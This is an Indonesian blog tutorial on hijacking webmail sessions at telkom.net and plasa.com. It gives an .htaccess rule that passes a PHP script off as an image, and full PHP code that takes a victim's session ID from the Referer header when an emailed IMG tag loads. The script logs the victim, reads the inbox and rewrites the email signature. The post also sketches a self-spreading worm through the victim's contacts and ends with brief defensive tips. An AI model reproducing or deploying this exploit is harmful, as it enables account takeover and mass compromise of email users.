Sebelum bisa melakukan serangan, yang pertama harus dilakukan adalah menyiapkan server side script sebagai target request untuk menangkap SessionID korban. Server side script ini akan di-”masking” sebagai file JPG dengan menggunakan mod_rewrite Apache (.htaccess). Server side script yang dimasking sebagai file JPG inilah yang akan dimasukkan dalam tag IMG dalam email yang dibaca korban. Bila korban membaca email attacker, maka akan terjadi request ke server side script itu, sehingga attacker bisa mendapatkan session ID korban dan menguasai emailnya.
URL yang akan kita jadikan tujuan request adalah: http://www.ilmuhacking.com/mylab/image.jpg yang sebenarnya adalah masking untuk server side script http://www.ilmuhacking.com/mylab/checkmail.php. Dengan menggunakan mod_rewrite Apache dan settings .htacess berikut ini masking checkmail.php menjadi image.jpg bisa dilakukan:
1
2
3
RewriteEngine On
RewriteBase /
RewriteRule mylab/image.jpg mylab/checkmail.php
Berikutnya saya harus menyiapkan file checkmail.php. Tugas dari script php itu adalah mendapatkan session ID kemudian langsung membajak session korban bermodalkan session ID tersebut.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
<?php
// Ambil header Referer
$ref = $_SERVER["HTTP_REFERER"];
$telkomnet = false;
$plasacom = false;
$width = 468;
$height = 100;
if (strpos($ref,“telkom.net”)>-1) {
$telkomnet = true;
}
if (strpos($ref,“plasa.com”)>-1) {
$plasacom = true;
}
if ($telkomnet===false && $plasacom===false) {
exit();
} $file = fopen(“daftarkorban.txt”,“a”);
$url_tokens = parse_url($ref);
$host = $url_tokens["host"];
$tokens = explode(“/”,$ref);
$sessid = $tokens[4];
fwrite($file,“######\n);
fwrite($file,“REFERER:”.$_SERVER["HTTP_REFERER"].\n);
fwrite($file,“SESSID:”.$sessid.\n);
$urlhost = “http://$host/Session/$sessid/mailbox.wssp?Mailbox=INBOX&”;
$inboxhtml = file_get_contents($urlhost);
preg_match(‘/<title>(.*?)<\/title>/i’, $inboxhtml, $matches);
$title=$matches[1];
$email = $title;
$pos = strpos($title,” “);
if ($pos > -1) {
$email = substr($title,0,$pos);
}
fwrite($file,“KORBAN:”.$email.\n);
fwrite($file,“******\n);
fclose($file);
$image = ImageCreate($width, $height);
$white = ImageColorAllocate($image, 255, 255, 255);
$black = ImageColorAllocate($image, 0, 0, 0);
$grey = ImageColorAllocate($image, 204, 204, 204);
ImageFill($image, 0, 0, $black);
ImageString($image, 3, 15, 5, $sessid, $white);
ImageString($image, 3, 25, 25, $email, $white);
// Writing Signature…
$url = http://mail.telkom.net/Session/$sessid/settings.wssp”;
if ($plasacom==true) {
$url = http://mail1.plasa.com/Session/$sessid/settings1.wssp”;
}
$old_settings = file_get_contents($url);
preg_match(‘/<textarea(.*?)>(.*?)<\/textarea>/i’, $old_settings, $matches);
$oldsig = $matches[2];
$data = array();
$data["UserFrom"] = $email;
$newsig = “[YOUR EMAIL HAS BEEN HACKED]“.$oldsig;
$data["Signature"] = $newsig;
$data["Update"] = “Update”;
$response = doPost($url,$data);
if ((strpos($response,“Updated”)>-1 && $telkomnet==true) || $plasacom==true) {
ImageString($image, 3, 35, 50, “Signature anda berhasil diganti menjadi:” , $white);
ImageString($image, 3, 45, 65, $newsig , $white);
}
header(“Content-Type: image/jpeg”);
ImageJpeg($image);
ImageDestroy($image);
function doPost($url,$data) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
$response = curl_exec($ch);
if(curl_errno($ch))
{
$response = curl_error($ch);
}
curl_close($ch);
return $response;
}
?>
Cara kerja script di atas adalah: Pada baris ke-3 isi header Referer diambil. Kemudian dibuat dan dibuka file daftarkorban.txt. File ini adalah log yang menyimpan daftar korban. Pada baris ke-22, session ID diambil dari header referer. Setelah session ID didapatkan kini script bisa mengubah signature korban, dengan cara mengirimkan POST request ke http://mail.telkom.net/Session/[SESSIONID_KORBAN]/settings.wssp, perhatikan baris ke-65. Setelah mengubah signature korban, pada baris ke-66 sampai baris ke-72, script membuat image dengan pesan “Signature anda berhasil diganti menjadi:”.
Launch The Attack
Oke, kini semua persiapan sudah siap. Kini saatnya kita melancarkan serangan dengan mengirimkan email html yang mengandung tag IMG. Dalam contoh attacker adalah rizki.wicaksono@telkom.net dan korban adalah rizki.wicaksono@plasa.com. Ingat ini hanya contoh, dalam kenyataannya attacker bisa menggunakan email apapun, bahkan email palsu (anonymous). Perhatikan gambar berikut ini yang menunjukan bagaimana email yang berisi jebakan dibuat dan ditujukan untuk korban.
Dalam gambar tersebut email diisi dengan tag HTML IMG. Perhatikan bahwa saya bisa saja membuat image tersebut invisible dengan memberikan atribut width dan src 0. Dengan membuat image menjadi invisible, korban tidak akan menyadari bahwa emailnya telah dibajak. Tapi untuk contoh saya membiarkan gambar berukuran besar. Berikut ini adalah isi tanda tangan (signature) email korban sebelum email dibuka.

signature1

Dan gambar berikut adalah gambar ketika email attacker tiba.

email attacker tiba

Dan gambar berikut adalah gambar ketika email attacker dibuka oleh korban. Pada gambar tersebut terlihat bahwa session id korban dan pesan bahwa signature korban berubah tertulis dalam file image.jpg.

victim open email and his session hijacked instantly

Pada saat korban membuka email dari attacker, pada saat itu juga attacker menguasai penuh account email korban. Dalam contoh artikel ini attacker mengubah signature korban dengan menambahkan string [YOUR EMAIL HAS BEEN HACKED]. Berikut ini adalah gambar signature korban setelah korban membuka email attacker.

signature2

Worm Attack: More Dangerous Scenario
Skenario serangan yang lebih berbahaya adalah bila attacker mengeksploitasi kelemahan ini untuk menciptakan worm. Ingat bahwa ketika attacker mendapatkan session ID, pada saat itu attacker memiliki power yang setara dengan korban. Dengan session korban, attacker bisa mengirimkan email serangan yang sama ke calon korban lain yang ada di dalam daftar buku alamat korban. Begitu teman korban membuka email itu, maka session dia juga dalam genggaman attacker dan dia juga akan menyebarkan serangan ke teman-temannya. Hal ini akan memicu reaksi berantai yang berbahaya.
Sulitkah membuat worm seperti itu? Tidak sulit kok, mudah sekali. Semua itu tidak lebih dari kombinasi request GET dan POST dengan berbekal session ID korban. Attacker harus membaca phone book dengan mengirim request HTTP (GET/POST) dengan session ID korban. Setelah itu attacker akan mengirimkan email serangan ke teman-teman korban juga dengan melakukan request HTTP dengan session ID korban. Begitu seterusnya. Tidak sulit bukan, apalagi buat orang yang sudah sering memprogram.
Tips Menghindari Serangan
Karena serangan ini dilakukan dengan membajak session web, maka serangan ini hanya bisa dilakukan bila korban membaca email telkom.net dan plasa.com dengan webmail. Jadi agar terhindar dari serangan ini, gunakanlah akses POP3 atau IMAP untuk membaca email. Dengan menggunakan email client non-web seperti Thunderbird dan Outlook anda akan aman dari serangan ini.
=============== [ EOF ] ================

 
Design by Wordpress Theme | Bloggerized by Free Blogger Templates | coupon codes